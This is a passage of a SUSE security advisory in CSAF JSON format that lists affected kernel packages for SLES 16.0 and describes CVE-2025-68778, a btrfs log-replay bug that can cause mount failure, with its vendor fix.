"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68777"
},
{
"cve": "CVE-2025-68778",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68778"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: don\u0027t log conflicting inode if it\u0027s a dir moved in the current transaction\n\nWe can\u0027t log a conflicting inode if it\u0027s a directory and it was moved\nfrom one parent directory to another parent directory in the current\ntransaction, as this can result an attempt to have a directory with\ntwo hard links during log replay, one for the old parent directory and\nanother for the new parent directory.\n\nThe following scenario triggers that issue:\n\n1) We have directories \"dir1\" and \"dir2\" created in a past transaction.\n Directory \"dir1\" has inode A as its parent directory;\n\n2) We move \"dir1\" to some other directory;\n\n3) We create a file with the name \"dir1\" in directory inode A;\n\n4) We fsync the new file. This results in logging the inode of the new file\n and the inode for the directory \"dir1\" that was previously moved in the\n current transaction. So the log tree has the INODE_REF item for the\n new location of \"dir1\";\n\n5) We move the new file to some other directory. This results in updating\n the log tree to included the new INODE_REF for the new location of the\n file and removes the INODE_REF for the old location. This happens\n during the rename when we call btrfs_log_new_name();\n\n6) We fsync the file, and that persists the log tree changes done in the\n previous step (btrfs_log_new_name() only updates the log tree in\n memory);\n\n7) We have a power failure;\n\n8) Next time the fs is mounted, log replay happens and when processing\n the inode for directory \"dir1\" we find a new INODE_REF and add that\n link, but we don\u0027t remove the old link of the inode since we have\n not logged the old parent directory of the directory inode \"dir1\".\n\nAs a result after log replay finishes when we trigger writeback of the\nsubvolume tree\u0027s extent buffers, the tree check will detect that we have\na directory a hard link count of 2 and we get a mount failure.\nThe errors and stack traces reported in dmesg/syslog are like this:\n\n [ 3845.729764] BTRFS info (device dm-0): start tree-log replay\n [ 3845.730304] page: refcount:3 mapcount:0 mapping:000000005c8a3027 index:0x1d00 pfn:0x11510c\n [ 3845.731236] memcg:ffff9264c02f4e00\n [ 3845.731751] aops:btree_aops [btrfs] ino:1\n [ 3845.732300] flags: 0x17fffc00000400a(uptodate|private|writeback|node=0|zone=2|lastcpupid=0x1ffff)\n [ 3845.733346] raw: 017fffc00000400a 0000000000000000 dead000000000122 ffff9264d978aea8\n [ 3845.734265] raw: 0000000000001d00 ffff92650e6d4738 00000003ffffffff ffff9264c02f4e00\n [ 3845.735305] page dumped because: eb page dump\n [ 3845.735981] BTRFS critical (device dm-0): corrupt leaf: root=5 block=30408704 slot=6 ino=257, invalid nlink: has 2 expect no more than 1 for dir\n [ 3845.737786] BTRFS info (device dm-0): leaf 30408704 gen 10 total ptrs 17 free space 14881 owner 5\n [ 3845.737789] BTRFS info (device dm-0): refs 4 lock_owner 0 current 30701\n [ 3845.737792] \titem 0 key (256 INODE_ITEM 0) itemoff 16123 itemsize 160\n [ 3845.737794] \t\tinode generation 3 transid 9 size 16 nbytes 16384\n [ 3845.737795] \t\tblock group 0 mode 40755 links 1 uid 0 gid 0\n [ 3845.737797] \t\trdev 0 sequence 2 flags 0x0\n [ 3845.737798] \t\tatime 1764259517.0\n [ 3845.737800] \t\tctime 1764259517.572889464\n [ 3845.737801] \t\tmtime 1764259517.572889464\n [ 3845.737802] \t\totime 1764259517.0\n [ 3845.737803] \titem 1 key (256 INODE_REF 256) itemoff 16111 itemsize 12\n [ 3845.737805] \t\tindex 0 name_len 2\n [ 3845.737807] \titem 2 key (256 DIR_ITEM 2363071922) itemoff 16077 itemsize 34\n [ 3845.737808] \t\tlocation key (257 1 0) type 2\n [ 3845.737810] \t\ttransid 9 data_len 0 name_len 4\n [ 3845.737811] \titem 3 key (256 DIR_ITEM 2676584006) itemoff 16043 itemsize 34\n [ 3845.737813] \t\tlocation key (258 1 0) type 2\n [ 3845.737814] \t\ttransid 9 data_len 0 name_len 4\n [ 3845.737815] \titem 4 key (256 DIR_INDEX 2) itemoff 16009 itemsize 34\n [ 3845.737816] \t\tlocation key (257 1 0) type 2\n [\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68778",
"url": "https://www.suse.com/security/cve/CVE-2025-68778"
},
{
"category": "external",
"summary": "SUSE Bug 1256683 for CVE-2025-68778",
"url": "https://bugzilla.suse.com/1256683"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
